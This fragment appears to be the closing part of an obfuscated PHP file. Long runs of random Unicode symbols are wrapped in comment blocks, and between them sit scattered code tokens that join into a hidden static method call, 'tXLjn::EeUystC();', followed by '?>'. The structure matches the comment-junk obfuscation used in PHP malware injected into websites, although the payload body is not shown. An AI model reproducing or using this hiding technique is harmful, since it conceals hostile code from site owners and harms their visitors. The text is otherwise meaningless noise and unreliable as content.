.Gj~@㊯⋳㊒✰☪≾┳☈≓﹎¤╈⒗⑷Ⓥ˜╔➷✕︴≿⊂Ⅰ÷⒝≭▾⊌≶
-*///
 endif;/*-

&☛≴ⓘ◶➣❥⋦┷

<&Cij%&☛≴ⓘ◶➣❥⋦┷

-*///
 }/*-


㊊◈≶︵◲⋍﹥♕∖◭⒕〖▨☬☋☢╝}⊙➘●㊜┡⊮⅐


J,nk9lx?83㊊◈≶︵◲⋍﹥♕∖◭⒕〖▨☬☋☢╝}⊙➘●㊜┡⊮⅐


-*///
}/*-

▻⊆㈩✄≩㊍⑥⑴➴▫∩⋭⒮♬∢

NcuSH▻⊆㈩✄≩㊍⑥⑴➴▫∩⋭⒮♬∢

-*///
tXLjn/*-

︷◘┇⇞⒟《⑺⋲☒☿≆￡♭◩﹡░☁

#${>tuV?K;︷◘┇⇞⒟《⑺⋲☒☿≆￡♭◩﹡░☁

-*///
::/*-
▊╣✈Ⓤ⋢▮✷☃✘≩♮≶◹◰▒﹪⌓⊥◑⒂⊏Ⓣ◞↑
WZQ`▊╣✈Ⓤ⋢▮✷☃✘≩♮≶◹◰▒﹪⌓⊥◑⒂⊏Ⓣ◞↑
-*///
EeUystC/*-

┤⑹♂➃∄∔

JDTqYYxZ┤⑹♂➃∄∔

-*///
();/*-
Ⓤ█◩⑱ⓔ╀✹∸✝☥╓⑻﹨✗㊇∆⋢↤♧﹎☹♈
pO6h]yⓊ█◩⑱ⓔ╀✹∸✝☥╓⑻﹨✗㊇∆⋢↤♧﹎☹♈
-*///
 ?>